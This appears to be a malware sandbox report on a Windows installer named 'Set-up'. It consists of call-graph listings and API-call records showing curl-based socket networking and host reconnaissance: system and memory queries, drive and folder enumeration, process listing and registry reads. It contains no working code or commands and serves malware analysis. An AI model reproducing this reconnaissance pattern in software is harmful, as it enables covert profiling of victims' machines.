93565->93667 93566 14b056 WSAGetLastError 93677 12d090 66 API calls 93566->93677 93568->93564 93675 154fd0 51 API calls 93568->93675 93569->93566 93574 14aff8 htons bind 93569->93574 93676 154fd0 51 API calls 93569->93676 93570 14b07b 93678 154f40 52 API calls 93570->93678 93581 14ae8e 93572->93581 93582 14aeb8 93572->93582 93572->93601 93575 14ade6 93573->93575 93576 14ad5f 93573->93576 93574->93568 93574->93569 93575->93580 93668 1620d0 58 API calls 93576->93668 93666 12d090 66 API calls 93577->93666 93671 12d090 66 API calls 93580->93671 93581->93557 93590 14ae93 strchr 93581->93590 93674 1745c0 12 API calls 93582->93674 93586 14b08b 93586->93601 93594 14aead 93590->93594 93591 14ad01 93672 154f40 52 API calls 93591->93672 93592 14aecc 93592->93554 93592->93557 93593 14ad7b 93595 14adb7 93593->93595 93669 154fd0 51 API calls 93593->93669 93679 1745c0 12 API calls 93594->93679 93670 163030 50 API calls 93595->93670 93600 14b0bf 93600->93560 93602 14b0ca htons 93600->93602 93601->93503 93601->93523 93658 122a00 50 API calls 93601->93658 93602->93560 93603 14b0e5 strtoul 93602->93603 93603->93560 93605 14a15f 93604->93605 93616 148c4d 93604->93616 93606 14a181 getsockname 93605->93606 93605->93616 93607 14a1f7 93606->93607 93608 14a1d0 WSAGetLastError 93606->93608 93610 14ef30 60 API calls 93607->93610 93686 12d090 66 API calls 93608->93686 93611 14a20f 93610->93611 93613 14a216 _errno _errno 93611->93613 93611->93616 93612 14a1eb 93688 154f40 52 API calls 93612->93688 93687 12d090 66 API calls 93613->93687 93616->93484 93618 1550a0 51 API calls 93616->93618 93617->93464 93618->93484 93619->93465 93620->93497 93621->93465 93622->93490 93623->93470 93624->93478 93626 1178c5 93625->93626 93627 1178dc 93625->93627 93689 1172a0 50 API calls 93626->93689 93627->93497 93629 1178d7 93629->93627 93631 117607 socket 93630->93631 93632 1175ef 93630->93632 93633 11762b 93631->93633 93634 11763f 93631->93634 93632->93631 93635 117601 93632->93635 93636 117643 93632->93636 
93680 1172a0 50 API calls 93633->93680 93634->93502 93635->93631 93681 1172a0 50 API calls 93636->93681 93639 11763a 93639->93634 93640 117654 __acrt_iob_func 93682 11cb20 78 API calls 93640->93682 93642 117674 fflush _errno 93642->93502 93644 14ef47 93643->93644 93646 14efa8 93643->93646 93645 14ef81 93644->93645 93650 14ef4c 93644->93650 93684 173d10 58 API calls 93645->93684 93648 14efc0 93646->93648 93685 11c960 49 API calls 93646->93685 93648->93505 93649 14ef66 _errno 93649->93505 93650->93649 93683 173d10 58 API calls 93650->93683 93653 14ef5f 93653->93649 93654 14ef96 htons 93653->93654 93654->93648 93655->93547 93656->93515 93657->93601 93658->93503 93659->93507 93660->93514 93661->93543 93662->93522 93663->93542 93664->93534 93665->93550 93666->93591 93667->93573 93668->93593 93669->93595 93670->93572 93671->93591 93672->93601 93673->93565 93674->93592 93675->93564 93676->93569 93677->93570 93678->93586 93679->93600 93680->93639 93681->93640 93682->93642 93683->93653 93684->93653 93685->93648 93686->93612 93687->93612 93688->93616 93689->93629 95164 343170 24 API calls 95165 150550 51 API calls 95327 45ab00 62 API calls 95328 46cb00 117 API calls 95329 113357 140 API calls 95166 286960 22 API calls 95167 384d70 61 API calls 95330 29cf60 38 API calls 95168 3a0170 72 API calls 93764 11255d 93765 499f70 93764->93765 93766 11256c GetSystemInfo 93765->93766 93767 633b30 malloc 93766->93767 93768 112589 93767->93768 93769 1125a0 GlobalMemoryStatusEx 93768->93769 93770 633b30 malloc 93769->93770 93771 1125ec 93770->93771 93772 112603 GetLogicalDriveStringsA 93771->93772 93773 112626 93772->93773 93774 112762 93772->93774 93775 633930 5 API calls 93773->93775 93777 633b30 malloc 93774->93777 93776 11262b 93775->93776 93776->93774 93779 11263c GetDriveTypeA 93776->93779 93778 1127bf 93777->93778 93782 1127d6 KiUserCallbackDispatcher 93778->93782 93780 112743 strlen 93779->93780 93781 112655 GetDiskFreeSpaceExA 93779->93781 93780->93776 93781->93780 93796 11268b 
93781->93796 93784 1127f8 93782->93784 93785 633b30 malloc 93784->93785 93787 112809 93785->93787 93788 633b30 malloc 93787->93788 93789 11282b 93788->93789 93790 112842 SHGetKnownFolderPath wcscpy wcscat FindFirstFileW 93789->93790 93791 112906 FindNextFileW 93790->93791 93792 112928 93790->93792 93791->93791 93791->93792 93794 633b30 malloc 93792->93794 93793 633a20 malloc 93793->93796 93795 11293d 93794->93795 93797 112954 K32EnumProcesses 93795->93797 93796->93780 93796->93793 93803 633c00 7 API calls 93796->93803 93804 633c90 strlen 93796->93804 93798 11297b 93797->93798 93800 112992 93797->93800 93799 633b30 malloc 93798->93799 93799->93800 93801 633b30 malloc 93800->93801 93802 1129e0 93801->93802 93803->93796 93805 1c8b50 93806 1c8b60 93805->93806 93808 1c8b88 93806->93808 93829 1d8e70 93806->93829 93834 1d88b0 QueryPerformanceFrequency QueryPerformanceCounter 93808->93834 93810 1c8b9a 93814 1c8c32 93810->93814 93836 1c7820 93810->93836 93812 1c8bc6 93812->93814 93845 1d4530 93812->93845 93815 1c8c2b 93815->93814 93816 1c8cb5 93815->93816 93878 1c8db0 13 API calls 93815->93878 93852 1ce7c0 93816->93852 93820 1c8d83 93820->93816 93822 1c8d8d 93820->93822 93879 1c6e90 memset memset 93822->93879 93824 1c8d1a 93860 1c6050 93824->93860 93825 1c8d40 93877 1c6e90 memset memset 93825->93877 93830 1d8ea7 93829->93830 93831 1d8e80 93829->93831 93830->93806 93880 1d8d60 9 API calls 93831->93880 93833 1d8e95 93833->93830 93835 1d88f2 93834->93835 93835->93810 93837 1c784c 93836->93837 93841 1c78f8 93836->93841 93838 1c78bc 93837->93838 93840 1c78c0 93837->93840 93837->93841 93843 1c7877 93837->93843 93883 1c7960 memset memmove memmove memcpy strlen 93838->93883 93840->93838 93882 1cf400 memset memset 93840->93882 93841->93812 93843->93838 93881 1cf400 memset memset 93843->93881 93846 1d455e 93845->93846 93847 1d4579 93845->93847 93884 1d4c20 15 API calls 93846->93884 93847->93815 93849 1d4572 93849->93847 93885 1d17d0 93849->93885 93851 1d458e 93851->93815 93853 1ce7db 
93852->93853 93855 1c8cf2 93852->93855 93916 1c4fe0 93853->93916 93855->93825 93856 1ce600 93855->93856 93857 1ce60d 93856->93857 93859 1c8d13 93856->93859 93857->93859 93920 1dcd70 memset 93857->93920 93859->93824 93859->93825 93861 1c60d9 93860->93861 93921 1daa30 93861->93921 93865 1c64a4 93960 1cf400 memset memset 93865->93960 93867 1c64c7 93868 1c6506 93867->93868 93869 1c68df 93867->93869 93961 1dc320 QueryPerformanceFrequency QueryPerformanceCounter 93868->93961 93872 1c6050 61 API calls 93869->93872 93871 1c6515 93962 1cf400 memset memset 93871->93962 93873 1c68d2 93872->93873 93873->93814 93875 1c652f 93963 1d8880 WakeAllConditionVariable 93875->93963 93878->93820 93880->93833 93881->93843 93882->93840 93883->93841 93884->93849 93886 1d1801 93885->93886 93903 1d1918 93885->93903 93906 1d5cc0 memset 93886->93906 93888 1d1808 93888->93903 93907 1d2cb0 memset 93888->93907 93890 1d1911 93891 1d1990 93890->93891 93890->93903 93908 1d31b0 memset 93890->93908 93893 1d19ab 93891->93893 93891->93903 93909 1d31b0 memset 93891->93909 93897 1d19ca 93893->93897 93893->93903 93910 1d31b0 memset 93893->93910 93900 1d1a76 93897->93900 93897->93903 93911 1de3e0 memset memmove memmove memcpy 93897->93911 93912 1d2f90 6 API calls 93897->93912 93900->93903 93904 1d1a9f 93900->93904 93913 1d1b30 10 API calls 93900->93913 93903->93851 93904->93903 93905 1d1ac8 93904->93905 93914 1d1b30 10 API calls 93904->93914 93905->93903 93915 1d1b30 10 API calls 93905->93915 93906->93888 93907->93890 93908->93891 93909->93893 93910->93897 93911->93897 93912->93897 93913->93900 93914->93904 93915->93905 93917 1c4fec 93916->93917 93918 1c5003 93917->93918 93919 1c4ff3 memset 93917->93919 93918->93855 93919->93918 93920->93859 93922 1daa5f 93921->93922 93923 1c62fc 93922->93923 93964 1ce730 93922->93964 93959 1c6d50 44 API calls 93923->93959 93926 1daabf 93928 1daacd htons 93926->93928 93939 1dab0e 93926->93939 93927 1dab18 htons 93929 1dab58 93927->93929 93928->93929 93930 1dab96 socket 
93929->93930 93931 1dab75 93929->93931 93930->93931 93930->93939 93932 1dabd0 ioctlsocket 93931->93932 93933 1dad2e 93931->93933 93931->93939 93934 1dabef setsockopt 93932->93934 93935 1dac10 93932->93935 93933->93939 93944 1dada0 connect 93933->93944 93948 1dadb3 WSAGetLastError 93933->93948 93950 1dade1 93933->93950 93934->93935 93934->93939 93936 1dac37 93935->93936 93937 1dac16 setsockopt 93935->93937 93940 1dac7a 93936->93940 93941 1dad04 93936->93941 93945 1dac57 htonl 93936->93945 93937->93936 93937->93939 93938 1dae6e closesocket 93938->93923 93939->93923 93939->93938 93942 1dace7 setsockopt 93940->93942 93946 1dac9d 93940->93946 93941->93933 93943 1dad0a setsockopt 93941->93943 93942->93941 93943->93933 93943->93939 93944->93948 93947 1dacc6 bind 93945->93947 93946->93947 93947->93939 93949 1dacdd 93947->93949 93948->93933 93948->93939 93949->93941 93949->93942 93950->93939 93967 1daf70 93950->93967 93953 1daeaf 93970 1ce760 memset 93953->93970 93954 1dae9f 93956 1ce7c0 memset 93954->93956 93957 1daea6 93956->93957 93957->93939 93971 1ce180 memset 93957->93971 93959->93865 93960->93867 93961->93871 93962->93875 93963->93873 93965 1c4fe0 memset 93964->93965 93966 1ce737 93965->93966 93966->93926 93966->93927 93966->93939 93968 1daf93 getsockname 93967->93968 93969 1dae21 93967->93969 93968->93969 93969->93939 93969->93953 93969->93954 93970->93957 93971->93939 95331 3d2370 65 API calls 93972 113d5e 93977 113d30 93972->93977 93973 113d90 93981 11fcb0 99 API calls 93973->93981 93976 113dc1 93977->93972 93977->93973 93978 120ab0 93977->93978 93982 1205b0 93978->93982 93981->93976 93983 1205bd 93982->93983 93987 1207c7 93982->93987 93983->93987 93988 12066a 93983->93988 93994 1207ce 93983->93994 94018 1203c0 52 API calls 93983->94018 94019 127450 83 API calls 93983->94019 93986 1207ef 94014 123000 93986->94014 93987->93977 93988->93994 93997 1206f0 93988->93997 94020 1273b0 83 API calls 93988->94020 93992 12075f getsockopt 93992->93997 93993 120802 93996 120a2f 
93993->93996 93998 120861 WSAWaitForMultipleEvents 93993->93998 94022 126fa0 93993->94022 94021 127380 50 API calls 93994->94021 93995 120707 WSAEventSelect 93995->93994 93995->93997 93996->93994 94041 122f10 QueryPerformanceCounter GetTickCount 93996->94041 93997->93986 93997->93992 93997->93995 94000 1176a0 84 API calls 93997->94000 94007 120854 93998->94007 94000->93997 94003 1208c8 WSAEnumNetworkEvents 94003->94007 94004 120a19 WSAResetEvent 94004->93996 94005 120a6b 94005->93994 94006 120a87 94005->94006 94042 126df0 Sleep WSASetLastError 94006->94042 94007->94003 94009 120928 WSAEventSelect 94007->94009 94013 120970 94007->94013 94009->94007 94010 120a94 94010->93994 94011 1209e8 WSAEnumNetworkEvents 94012 1209d0 WSAEventSelect 94011->94012 94011->94013 94012->94011 94012->94013 94013->94004 94013->94011 94013->94012 94015 123018 94014->94015 94017 123031 94014->94017 94016 12d8c0 2 API calls 94015->94016 94015->94017 94016->94017 94017->93993 94018->93983 94019->93983 94020->93988 94021->93987 94023 126fd4 94022->94023 94024 126feb 94022->94024 94023->94024 94035 12701b 94023->94035 94025 120847 94024->94025 94026 127186 WSASetLastError 94024->94026 94027 126fff Sleep 94024->94027 94025->93994 94025->93998 94025->94007 94026->94025 94027->94025 94028 127176 94031 127207 select 94028->94031 94029 1271aa 94030 12730b 94029->94030 94033 127331 WSASetLastError 94029->94033 94034 1271cc Sleep 94029->94034 94030->94025 94032 127312 WSAGetLastError 94030->94032 94031->94030 94039 127233 94031->94039 94032->94025 94033->94025 94033->94030 94034->94025 94036 1271ec 94034->94036 94035->94028 94035->94029 94036->94032 94037 12726b __WSAFDIsSet 94038 12729a __WSAFDIsSet 94037->94038 94037->94039 94038->94039 94040 1272ba __WSAFDIsSet 94038->94040 94039->94025 94039->94037 94039->94038 94039->94040 94040->94039 94041->94005 94042->94010 95333 1f8b50 318 API calls 95170 118940 51 API calls 95335 113b40 AcquireSRWLockExclusive ReleaseSRWLockExclusive 95171 34f560 68 API 
calls 95337 34eb60 26 API calls 95338 145340 95 API calls 95173 282570 23 API calls 95339 18a340 664 API calls 95174 1be940 20 API calls 94414 1d9740 94415 1d975d 94414->94415 94416 1d9780 94414->94416 94417 1d78a0 2 API calls 94415->94417 94418 1d9788 getenv 94416->94418 94419 1d9914 memset RegOpenKeyExA 94416->94419 94426 1d9763 94417->94426 94421 1d78a0 2 API calls 94418->94421 94420 1d995a RegQueryValueExA ExpandEnvironmentStringsA RegCloseKey strlen 94419->94420 94441 1d9812 94419->94441 94469 1d78a0 94420->94469 94423 1d979b 94421->94423 94424 1d97a6 _stat64 94423->94424 94423->94441 94425 1d97c7 94424->94425 94431 1d980b 94424->94431 94427 1d97f6 _stricmp 94425->94427 94428 1d97e2 _time64 94425->94428 94426->94418 94426->94424 94426->94441 94427->94431 94428->94427 94430 1d986e 94430->94441 94456 1d77b0 94430->94456 94431->94441 94455 1d5ca0 memset 94431->94455 94434 1c4fe0 memset 94435 1d9896 94434->94435 94436 1d98a1 _time64 94435->94436 94435->94441 94437 1d78a0 2 API calls 94436->94437 94438 1d98bb 94437->94438 94438->94441 94474 1ce2d0 memset _time64 94438->94474 94440 1d98d3 94440->94441 94475 1ce2d0 memset _time64 94440->94475 94443 1d6d60 memcmp 94453 1d98e8 94443->94453 94444 1cd120 17 API calls 94444->94453 94446 1c4fe0 memset 94446->94453 94447 1ce730 memset 94447->94453 94449 1d6320 memcpy 94449->94453 94450 1d78a0 strlen memcpy 94450->94453 94451 1d9c3d _stricmp 94451->94453 94452 1ce7c0 memset 94452->94453 94453->94441 94453->94443 94453->94444 94453->94446 94453->94447 94453->94449 94453->94450 94453->94451 94453->94452 94454 1ce3c0 memset strlen memcpy 94453->94454 94476 1cd190 94453->94476 94525 1ce760 memset 94453->94525 94454->94453 94455->94430 94457 1d7827 94456->94457 94458 1d77d7 fopen 94456->94458 94457->94434 94457->94441 94459 1d780e GetLastError 94458->94459 94460 1d77e9 fseek 94458->94460 94459->94457 94461 1d782f ftell 94460->94461 94462 1d7801 fclose 94460->94462 94461->94462 94463 1d783c fseek 94461->94463 94462->94457 
94463->94462 94464 1d784f 94463->94464 94465 1d787a 94464->94465 94526 1d6050 94464->94526 94465->94462 94468 1d7866 fread 94468->94462 94468->94465 94470 1d78ae strlen 94469->94470 94471 1d78e1 94469->94471 94470->94471 94472 1d78bc 94470->94472 94471->94423 94472->94471 94473 1d78d6 memcpy 94472->94473 94473->94471 94474->94440 94475->94453 94478 1cd1ae 94476->94478 94484 1cd1fa 94476->94484 94477 1cd253 SetLastError 94481 1cd872 94477->94481 94478->94477 94534 1cd8f0 32 API calls 94478->94534 94481->94453 94482 1cd1f3 94551 1d78f0 strlen memcpy 94482->94551 94485 1cd4f9 94484->94485 94486 1cd4b7 94484->94486 94488 1cd504 94485->94488 94543 1cd8f0 32 API calls 94485->94543 94535 1cd8f0 32 API calls 94486->94535 94495 1cd516 94488->94495 94544 1cd8f0 32 API calls 94488->94544 94489 1cd4ce 94499 1cd4e3 94489->94499 94536 1cd8f0 32 API calls 94489->94536 94491 1cd51f 94493 1cd52c 94491->94493 94546 1cd8f0 32 API calls 94491->94546 94497 1cd535 94493->94497 94547 1cd8f0 32 API calls 94493->94547 94495->94491 94545 1cd8f0 32 API calls 94495->94545 94511 1cd53e 94497->94511 94548 1cd8f0 32 API calls 94497->94548 94500 1cd4f4 94499->94500 94537 1cd8f0 32 API calls 94499->94537 94505 1cd5bf 94500->94505 94538 1cd8f0 32 API calls 94500->94538 94503 1cd547 94509 1cd1e8 94503->94509 94550 1cd8f0 32 API calls 94503->94550 94510 1cd5fb 94505->94510 94539 1cd8f0 32 API calls 94505->94539 94508 1cd87f 94508->94477 94552 1cd8f0 32 API calls 94508->94552 94509->94477 94509->94482 94516 1cd632 94510->94516 94540 1cd8f0 32 API calls 94510->94540 94511->94503 94511->94508 94513 1cd7fe 94511->94513 94549 1cd8f0 32 API calls 94513->94549 94515 1cd8b6 94515->94477 94553 1d78f0 strlen memcpy 94515->94553 94520 1cd66e 94516->94520 94541 1cd8f0 32 API calls 94516->94541 94520->94509 94542 1cd8f0 32 API calls 94520->94542 94521 1cd8c5 94554 1d7890 strlen 94521->94554 94525->94453 94527 1d605d 94526->94527 94528 1d606e 94526->94528 94527->94528 94530 1d5e20 94527->94530 94528->94465 
94528->94468 94531 1d5e2d 94530->94531 94533 1d5ecd 94530->94533 94532 1d5ea4 memmove 94531->94532 94531->94533 94532->94533 94533->94528 94534->94509 94535->94489 94536->94499 94537->94500 94538->94505 94539->94510 94540->94516 94541->94520 94542->94509 94543->94488 94544->94495 94545->94491 94546->94493 94547->94497 94548->94511 94549->94503 94550->94509 94551->94481 94552->94515 94553->94521 94554->94509 95341 1f3340 211 API calls 95177 117170 __acrt_iob_func __acrt_iob_func fclose 95178 130970 87 API calls 95343 455320 58 API calls 95179 26d940 160 API calls 95344 269b40 85 API calls 95345 1c8f70 80 API calls 95180 11157c FreeLibrary 95346 1f3370 131 API calls 95181 111160 158 API calls 95348 128760 54 API calls 95349 12e760 178 API calls 95350 351b40 52 API calls 95184 3175b0 64 API calls 95351 114390 91 API calls 95352 11cb90 78 API calls 95353 22fba0 27 API calls 95185 182590 155 API calls 95354 1b6b90 memcpy memcpy 95187 1dd990 memset 95189 120580 113 API calls 95355 13e380 106 API calls 95357 24a7b0 74 API calls 95190 171580 151 API calls 95358 2827b0 _time64 _gmtime64 94366 2947b0 94392 2ee5d0 strlen MultiByteToWideChar 94366->94392 94369 2947df 94405 28d520 20 API calls 94369->94405 94370 294824 94406 2c7120 20 API calls 94370->94406 94373 2947ed 94375 29488d fclose 94373->94375 94379 2947f8 94373->94379 94374 294829 94407 2c7220 20 API calls 94374->94407 94375->94379 94377 29483a GetLastError 94408 2c7310 20 API calls 94377->94408 94380 294852 _errno 94381 29486b 94380->94381 94382 294860 _errno 94380->94382 94409 2c7120 20 API calls 94381->94409 94382->94381 94384 294898 94382->94384 94411 2c7120 20 API calls 94384->94411 94385 294870 94410 2c7220 20 API calls 94385->94410 94388 29489d 94412 2c7220 20 API calls 94388->94412 94389 294881 94413 2c7310 20 API calls 94389->94413 94393 2ee6b0 GetLastError 94392->94393 94397 2ee608 94392->94397 94394 2ee6bd MultiByteToWideChar 94393->94394 94395 2ee6e2 GetLastError 94393->94395 94394->94395 94394->94397 
94396 2ee6f4 fopen 94395->94396 94401 2947c4 strchr 94395->94401 94396->94401 94398 2ee622 MultiByteToWideChar 94397->94398 94399 2ee649 strlen MultiByteToWideChar 94398->94399 94398->94401 94400 2ee673 _wfopen 94399->94400 94399->94401 94400->94401 94402 2ee685 _errno 94400->94402 94401->94369 94401->94370 94403 2ee6a0 fopen 94402->94403 94404 2ee690 _errno 94402->94404 94403->94401 94404->94401 94404->94403 94405->94373 94406->94374 94407->94377 94408->94380 94409->94385 94410->94389 94411->94388 94412->94389 94413->94379 95359 4987d0 __stdio_common_vswprintf 95360 1d4b80 14 API calls 95192 303590 23 API calls 94567 11f7b0 94569 11f7c3 94567->94569 94587 11f97a 94567->94587 94569->94587 94588 120150 94569->94588 94571 11f854 94571->94587 94594 14cd80 94571->94594 94572 11f942 94573 11f987 94572->94573 94574 161390 50 API calls 94572->94574 94613 161390 94573->94613 94574->94572 94577 161390 50 API calls 94578 11f9a0 94577->94578 94579 161390 50 API calls 94578->94579 94580 11f9ac 94579->94580 94581 11f9bb WSACloseEvent 94580->94581 94617 1175a0 94581->94617 94584 1175a0 50 API calls 94585 11fa12 94584->94585 94586 1175a0 50 API calls 94585->94586 94586->94587 94589 120167 94588->94589 94590 12d8c0 2 API calls 94589->94590 94593 1201c3 94589->94593 94591 1201b1 94590->94591 94623 1230d0 51 API calls 94591->94623 94593->94571 94595 14d0f1 94594->94595 94603 14cd9a 94594->94603 94595->94572 94596 14d0e5 94597 161390 50 API calls 94596->94597 94597->94595 94598 12d8c0 2 API calls 94608 14ce9b 94598->94608 94599 14ce6b 94599->94598 94601 14d016 94629 12f6c0 156 API calls 94601->94629 94603->94596 94603->94599 94624 14dc30 99 API calls 94603->94624 94606 12d8c0 2 API calls 94611 14cf4b 94606->94611 94607 14d018 94628 127380 50 API calls 94607->94628 94608->94601 94608->94611 94625 14dc30 99 API calls 94608->94625 94609 126fa0 9 API calls 94609->94611 94611->94601 94611->94606 94611->94607 94611->94609 94626 14e130 63 API calls 94611->94626 94627 127380 50 API calls 
94611->94627 94614 11f98d 94613->94614 94616 16139d 94613->94616 94614->94577 94615 1175a0 50 API calls 94615->94614 94616->94615 94618 1175d4 94617->94618 94619 1175aa 94617->94619 94618->94584 94619->94618 94620 1175c1 94619->94620 94630 1172a0 50 API calls 94620->94630 94622 1175d1 94622->94618 94623->94593 94624->94603 94625->94608 94626->94611 94627->94611 94628->94601 94629->94596 94630->94622 95362 116bb0 84 API calls 95193 162db0 107 API calls 95363 266f80 61 API calls 95194 17f5b0 140 API calls 95196 39e990 62 API calls 95197 2f2580 24 API calls 95198 1189a0 51 API calls 95199 1111a3 157 API calls 95367 120f00 100 API calls 95200 13c5a0 90 API calls 95368 14d7a0 87 API calls 95369 347b80 22 API calls 95370 111ba5 42 API calls 95201 1ea9a0 20 API calls 95202 1139d0 111 API calls 95203 22f5e0 66 API calls 95372 1467d0 170 API calls 93690 1131d7 CreateToolhelp32Snapshot 93691 113200 93690->93691 93692 113223 93690->93692 93706 1115b0 42 API calls 93691->93706 93703 633930 93692->93703 93695 1132dc CloseHandle 93697 11321e 93695->93697 93699 113255 93702 1132bc Process32Next 93699->93702 93707 633c00 7 API calls 93699->93707 93708 633c90 strlen 93699->93708 93709 633b30 malloc 93699->93709 93702->93695 93702->93699 93711 633950 malloc 93703->93711 93706->93697 93707->93699 93710 633b4e 93709->93710 93710->93699 93712 113232 Process32First 93711->93712 93713 633964 93711->93713 93712->93695 93712->93699 93718 631610 malloc malloc free 93713->93718 93715 6339a5 93716 6339a9 93715->93716 93717 6339b8 free 93715->93717 93716->93712 93717->93712 93718->93715 95205 26a9e0 109 API calls 95206 1725d0 129 API calls 95208 18edd0 75 API calls 95374 494380 _stat64 95375 111bdb 47 API calls 95376 120f00 99 API calls 95377 33cbe0 21 API calls 95378 26abf0 69 API calls 94312 1113c9 94313 1113d0 94312->94313 94314 1113e3 94313->94314 94315 1111da 94313->94315 94362 498a20 131 API calls 94314->94362 94317 111460 _initterm 94315->94317 94318 1111e7 94315->94318 94320 111483 
                                APIs
                                  • Part of subcall function 0012D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,001201B1), ref: 0012D8E2
                                • setsockopt.WS2_32(?,00000029,0000001B,00000000,00000004), ref: 0014A670
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0014A6A1
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0014A6AB
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0014A6AF
                                  • Part of subcall function 0012D090: GetLastError.KERNEL32 ref: 0012D0A1
                                  • Part of subcall function 0012D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0012D0A9
                                  • Part of subcall function 0012D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0012D0CD
                                  • Part of subcall function 0012D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0012D0D7
                                  • Part of subcall function 0012D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 0012D381
                                  • Part of subcall function 0012D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 0012D3A2
                                  • Part of subcall function 0012D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0012D3BF
                                  • Part of subcall function 0012D090: GetLastError.KERNEL32 ref: 0012D3C9
                                  • Part of subcall function 0012D090: SetLastError.KERNEL32(00000000), ref: 0012D3D4
                                  • Part of subcall function 00154F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00154F9E
                                • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0014A831
                                • WSAGetLastError.WS2_32 ref: 0014A854
                                • getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0014A97A
                                • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0014A9A6
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0014AB0F
                                • htons.WS2_32(?), ref: 0014AC01
                                • getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0014AC38
                                • setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 0014AC64
                                • WSAGetLastError.WS2_32 ref: 0014ACDC
                                • WSAGetLastError.WS2_32 ref: 0014ADF5
                                • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000025), ref: 0014AE9D
                                • htons.WS2_32(?), ref: 0014AEDB
                                • bind.WS2_32(?,00000002,00000010), ref: 0014AEF5
                                • WSAGetLastError.WS2_32 ref: 0014AFB9
                                • htons.WS2_32(?), ref: 0014AFFC
                                • bind.WS2_32(?,?,?), ref: 0014B014
                                • WSAGetLastError.WS2_32 ref: 0014B056
                                • htons.WS2_32(?), ref: 0014B0D2
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,0000000A), ref: 0014B0EA
                                Strings
                                • @, xrefs: 0014A8F4
                                • Could not set TCP_NODELAY: %s, xrefs: 0014A871
                                • @, xrefs: 0014AC42
                                • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0014AD0A
                                • Local Interface %s is ip %s using address family %i, xrefs: 0014AE60
                                • Bind to local port %d failed, trying next, xrefs: 0014AFE5
                                • cf-socket.c, xrefs: 0014A5CD, 0014A735
                                • Local port: %hu, xrefs: 0014AF28
                                • Trying %s:%d..., xrefs: 0014A7C2, 0014A7DE
                                • Couldn't bind to '%s' with errno %d: %s, xrefs: 0014AE1F
                                • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0014A6CE
                                • bind failed with errno %d: %s, xrefs: 0014B080
                                • cf_socket_open() -> %d, fd=%d, xrefs: 0014A796
                                • Name '%s' family %i resolved to '%s' family %i, xrefs: 0014ADAC
                                • Trying [%s]:%d..., xrefs: 0014A689
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ErrorLast$_errno$htonssetsockopt$bindgetsockoptstrrchr$CounterPerformanceQuery__sys_errlist__sys_nerrstrchrstrcpystrlenstrtoul
                                • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                • API String ID: 2815861332-2373386790
                                • Opcode ID: 540b317aa5e3fe0dea3accf650ee24bb9f4d8a1f0ab5dab481c492f0b61873c6
                                • Instruction ID: b3096ff5d39d32830719af233b7260f96040b9a0b475031ef9617b378064c16b
                                • Opcode Fuzzy Hash: 540b317aa5e3fe0dea3accf650ee24bb9f4d8a1f0ab5dab481c492f0b61873c6
                                • Instruction Fuzzy Hash: BC622271548340ABE720CF24C846BABB7F5FF95314F454929F988972A2E771E844CB93

                                Control-flow Graph

                                APIs
                                • FindFirstFileA.KERNELBASE ref: 00112A27
                                • RegOpenKeyExA.KERNELBASE ref: 00112A8A
                                • CharUpperA.USER32 ref: 00112AEF
                                • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00112B05
                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00112B6D
                                • Process32First.KERNEL32 ref: 00112B88
                                • Process32Next.KERNEL32 ref: 00112BC0
                                • QueryFullProcessImageNameA.KERNELBASE ref: 00112C26
                                • CloseHandle.KERNELBASE ref: 00112C49
